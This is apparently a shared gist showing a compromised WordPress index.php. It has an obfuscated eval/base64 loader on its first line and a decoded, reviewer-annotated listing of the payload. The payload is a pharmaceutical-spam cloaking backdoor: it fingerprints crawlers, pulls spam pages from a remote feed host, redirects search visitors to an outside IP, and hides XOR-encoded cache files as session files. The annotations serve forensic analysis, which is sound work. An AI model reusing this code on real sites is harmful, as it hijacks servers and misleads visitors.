@evandhoffman
Last active August 29, 2015 13:57
Owned wordpress index.php
<?php
/*
 * NOTE(review): injected loader. A single eval(gzinflate(base64_decode(...)))
 * statement sits ahead of the stock WordPress index.php header that follows,
 * so the hidden code runs on every request served through index.php.
 * The listing after "$ php crap.php" appears to be the decoded form of this payload.
 * A PHP open tag immediately followed by eval/gzinflate/base64_decode on line 1
 * of a core file is a strong indicator of compromise.
 */
eval(gzinflate(base64_decode('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')));?>^M
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
$ php crap.php
<?php
// Include guard: everything below runs only if the constant 'frmDs' is not yet
// defined, so a second copy of the payload in the same request does nothing.
if (!defined('frmDs')){
define('frmDs' ,1);
// Turns off all PHP error reporting, so failures in the code below are not
// reported on the page or in logs that honour this setting.
error_reporting(0);
// Downloads $url and returns the response body with surrounding whitespace trimmed.
// Uses cURL when the extension is available, otherwise file_get_contents() with
// warnings suppressed by '@'. Only CURLOPT_RETURNTRANSFER is set; no timeout is
// configured here, so a slow remote host can delay the page that triggered the fetch.
// On a cURL error $out is set to false, but trim() turns that into an empty string,
// so callers receive '' rather than false.
function frm_dl ($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec ($ch);
if (curl_errno($ch) !== 0) $out = false;
curl_close ($ch);
} else {$out = @file_get_contents($url);}
return trim($out);
}
// XORs every byte of $in with the single character '*' (0x2A) and returns the result.
// The operation is its own inverse, so the same function encodes data before it is
// written to the cache file and decodes it when read back (see frm_getcache).
// Forensic note: cache files left on disk can be read by XOR-ing each byte with 0x2A.
function frm_crpt($in){
$il=strlen($in);$o='';
for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
return $o;
}
// Returns the content of $link, served from an on-disk cache under $tmpdir.
//   $tmpdir  directory that holds the cache files
//   $link    URL to fetch; the cache key is md5() of the URL with the leading
//            "http://host" part stripped
//   $cmtime  maximum cache age in minutes (compared as 60 * $cmtime seconds)
//   $toe     when true, an empty download keeps the existing cache file
// Cache files are named "sess_" + 32 hex characters, which resembles PHP's own
// session file naming, and their content is XOR-encoded with frm_crpt().
// Returns the decoded cache content, or '' when nothing could be read.
function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
$fe = file_exists($f);
// Refresh when the file is missing or older than the allowed age.
if(!$fe || time() - filemtime($f) > 60 * $cmtime)
{
$dlc=frm_dl($link);
// Failed download with an existing file: only bump its mtime so the stale copy is reused.
// NOTE(review): frm_dl() returns trim($out), so a strict false may never reach this test.
if($fe && $dlc===false)
@touch($f);
else
{
// Empty download with $toe set: keep the old content and bump its mtime.
if($fe && empty($dlc) && $toe)
{
@touch($f);
}
else
{
// Write the XOR-encoded download; if the file cannot be opened, return the
// downloaded content directly without caching it.
if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
else{return $dlc;}
}
}
}
// Read the cache file back and decode it.
$fc = @file_get_contents($f);
return ($fc)?frm_crpt($fc):'';
}
// Decides whether the current visitor should be treated as a crawler.
// Returns true when any of the following holds:
//   - REMOTE_ADDR, converted to an unsigned 32-bit integer, falls in one of the
//     hard-coded ranges in $rs (presumably crawler networks; ownership not verified here)
//   - the User-Agent header is empty
//   - the lower-cased User-Agent contains one of the substrings in $bots
//   - the reverse-DNS name of REMOTE_ADDR contains 'google', 'msn' or 'yahoo'
// Returns false otherwise. The gethostbyaddr() call performs a DNS lookup for
// every request that reaches it.
function frm_isbot(){
$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
// ip2long() can return a negative number on 32-bit builds; shift it into the unsigned range.
if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296;
$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
if(!$ua)return true;
$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
$hba=array('google','msn','yahoo');
if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
return false;
}
// Finds a writable directory for the cache files.
// Candidates, in order: the fixed list in $fs, the TMP/TEMP/TMPDIR environment
// variables, sys_get_temp_dir() and finally the current directory.
// Each candidate is probed by creating and deleting a file named md5(rand()).
// Returns the first directory where that succeeds, or false when none is writable.
// Forensic note: these are the locations to search for leftover "sess_" cache files.
function frm_tmpdir(){
$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
if ($t = getenv($v)) {$fs[]=$t;}
}
if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
$fs[]='.';
foreach ($fs as $f){
$tf = $f.'/'.md5(rand());
if($fp = @fopen($tf, 'w')){
fclose($fp);
unlink($tf);
return $f;
}
}
return false;
}
// Returns true when the lower-cased Referer header contains one of the listed
// search-engine names followed by a dot (e.g. "google."), false otherwise.
// The comparison uses loose '!=false', so a match at offset 0 of the header is
// treated as no match.
function frm_seref(){
$r = @strtolower($_SERVER["HTTP_REFERER"]);
$ses = array('google','bing','yahoo','ask','aol');
foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
return false;
}
// Looks for one of a fixed list of pharmaceutical keywords in a string.
//   $s  string to search; when omitted, the lower-cased Referer header
//       concatenated with REQUEST_URI is used
// Returns the first keyword found as a whole word (delimited by a word boundary
// or an underscore), or '' when nothing matches.
// Returns '' immediately when the string contains "site%3A" or "inurl%3A", the
// URL-encoded forms of "site:" and "inurl:" (presumably so visitors arriving from
// such searches are left alone; intent not confirmed by the code).
function frm_havekey($s=false){
$nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
$k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
return '';
}
// Folds the bytes of $Str into a number: for each byte the running value $Check
// is multiplied by $Magic, reduced back into 32-bit range when it exceeds 2^32,
// and the byte's ordinal is added. Returns the final value of $Check.
// Used by frm_chhash() with two different seed/multiplier pairs.
// NOTE(review): $Str{$i} is the curly-brace string offset syntax, which was
// removed in PHP 8.0, so this sample targets older PHP versions.
function frm_strtonum($Str, $Check, $Magic) {
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
// Builds the checksum string that frm_chpr() sends as the "ch" query parameter.
// Steps visible in the code:
//   1. two frm_strtonum() hashes of $String with different seeds and multipliers
//   2. bit shuffling of both values into a single number ($Hashnum)
//   3. a check digit computed over the decimal digits of that number, doubling
//      every second digit from the right and summing the digits of the result
// Returns the literal '7', followed by the check digit, followed by the unsigned
// decimal form of $Hashnum.
function frm_chhash($String) {
$Check1 =frm_strtonum($String, 0x1505, 0x21);
$Check2 = frm_strtonum($String, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
$Hashnum = ($T1 | $T2);
$CheckByte = 0;
$Flag = 0;
// '%u' prints the value as an unsigned decimal string.
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
// Walk the digits from right to left; every second digit is doubled and its digits summed.
for ($i = $length - 1; $i >= 0; $i --) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
// Queries toolbarqueries.google.com for the rank of $url, sending the
// frm_chhash() checksum as "ch", and caches the answer in directory $td for
// 60*24*7 minutes (one week) through frm_getcache().
// When the response contains "Rank_", returns the single character at offset 9
// of the response; otherwise falls through and returns null.
// Detection note: outbound requests from a web server to this host with
// "features=Rank" in the query string are a network-level trace of this code.
function frm_chpr($url,$td){
$ch=frm_chhash($url);
$res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
}
// Redirects human visitors who arrived from a search engine.
// When frm_isbot() is false and frm_seref() is true, the request is terminated
// with a minimal HTML page whose script sets document.location to
// http://178.73.212.30/stat/go.php, passing the matched keyword ($k), the
// URL-encoded Referer (s) and the URL-encoded host + request URI (r).
// For every other visitor the function returns without output.
// Indicators on this line: the IP address 178.73.212.30 and the path /stat/go.php.
function frm_red($k){
if(!frm_isbot() && frm_seref()){
$r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$s=@urlencode($_SERVER['HTTP_REFERER']);
die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
}
}
// Main routine of the payload. It decides per request whether to let WordPress
// render normally, replace the page with content fetched from a remote feed, or
// redirect the visitor. Crawlers and humans get different treatment (cloaking).
$tdir = frm_tmpdir();
$isb=frm_isbot();
$k=frm_havekey();
// Host name in lower case with a leading "www." removed.
$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
// If the request carries a POST field named md5($host.'ch'), print its value
// verbatim and stop. This looks like a presence check for the operator; the
// value is echoed without any escaping.
if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
// Continue only with a writable cache directory, a host name shorter than 100
// characters, and a host that is not a dotted IPv4 address.
if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
// Three-letter query parameter name derived from the host name.
$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
// Remote feed endpoint; the host name uwvbfiyuw.byinter.net and the path
// /stat/feed.php are indicators visible in outbound traffic.
$sp = "http://uwvbfiyuw.byinter.net/stat/feed.php?pa=$parg&h=$host";
// Case 1: a crawler requests a page whose looked-up rank is above 1. The feed
// response for that page replaces the output.
// NOTE(review): frm_chpr() is declared with two parameters but called with one here.
$tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if($isb && ($ppr = frm_chpr($tp)) > 1){
$pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
if($pc) die($pc);
}
// Case 2: the request is "/?..." or "/index.php?..." and carries a positive
// numeric value in the $parg parameter. frm_red() redirects human search
// visitors; everyone else is served the feed content for that page id.
$ruri = strtolower($_SERVER['REQUEST_URI']);
$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
frm_red($k);
die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
}
// Case 3: a crawler requests the home page. A non-empty feed response replaces it.
if (($ruri=='/' || $ruri=='/index.php') && $isb) {
$c=frm_getcache($tdir, $sp ,60*24);
if($c)die($c);
}
// Case 4: a keyword was found and the feed's "|"-separated path list contains
// the requested URI. The list is cached for 30 minutes for crawlers and one week
// for others. Human search visitors are redirected; everyone else gets feed content.
if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
if(strpos($sdl, '|'.$ruri.'|') !== false){
frm_red($k);
die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
}
}
}
// Fallback: any request with a keyword match still goes through the redirect check.
if($k) frm_red($k);
}
?>